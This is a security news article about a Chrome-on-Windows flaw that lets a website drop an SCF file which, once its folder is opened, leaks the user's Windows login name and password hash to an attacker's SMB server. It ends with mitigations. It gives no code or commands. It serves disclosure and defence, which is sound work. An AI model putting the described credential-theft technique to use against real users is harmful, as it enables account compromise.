A Google Chrome vulnerability, which was uncovered by DefenceCode security engineer Bosko Stankovic, is said to allow hackers to download malware onto a victim’s PC in order to steal people’s Windows login credentials and launch SMB (Server Message Block) relay attacks, according to security experts.
Stankovic said in a blog that he found the flaw in a default configuration of the latest version of Google’s Chrome running on any version of Microsoft’s Windows operating system, including Windows 10. The flaw shouldn’t just have IT admins worried, as it also poses a “significant threat” to large companies and even regular users. He also claimed that just by visiting a website containing a malicious SCF (Shell Command File) file, could allow victims to unknowingly share their computer’s login credentials with hackers via Chrome and the SMB protocol.
The attack technique that can allow credential theft is not new, but a combination of two different techniques, one of which taken from the Stuxnet operation (Stuxnet — a powerful malware that specially designed to destroy Iran’s nuclear program) and the other from a technique demonstrated at a Black Hat security conference by two security researchers.
Stealing Windows Credentials Centered Around SCF files:
According to Stankovic, the attack is pretty straightforward which involves victims being tricked into clicking on a malicious link, which triggers an automatic download of Windows Explorer SCF file.
“SCF (Shell Command File) is a file format that supports a very limited set of Windows Explorer commands that help define an icon on your desktop, such as My Computer and Recycle Bin. Just like LNK files (shortcuts), SCF files, when stored on disk, will retrieve an icon file when the user loads the file in a Windows Explorer window.”
Stankovic explains that it’s very easy to get an SCF file on users’ computers. This is because, in its default configuration, Chrome will automatically download files that it deems safe without prompting the user for a download location. Google deems SCF files as safe, having no reason to prompt the user for action.
The SCF file lies dormant until the victim opens the download directory folder, after which it attempts to exfiltrate data linked with a Windows icon located on the hacker’s server. This, in turn, provides the attacker with the victim’s username and hashed password.
“Currently, the attacker just needs to entice the victim (using fully updated Google Chrome and Windows) to visit his website to be able to proceed and reuse victim’s authentication credentials,” Stankovic wrote in a blog post, describing the flaw.
Defeating Windows Login Credential Theft:
The security researcher advises the users to disable the automatic downloads in Google Chrome. To do so, one needs to open ‘Show Advanced Settings’ in Settings. There, check the ‘Ask where to save each file before downloading.’ This change will force Google to ask for your permission before downloading a file, which would significantly decrease the risk of credential theft attacks using SCF files.
More advanced protection measures include blocking outbound SMB requests from the local network to the WAN via firewalls, so local computers can’t query remote SMB servers.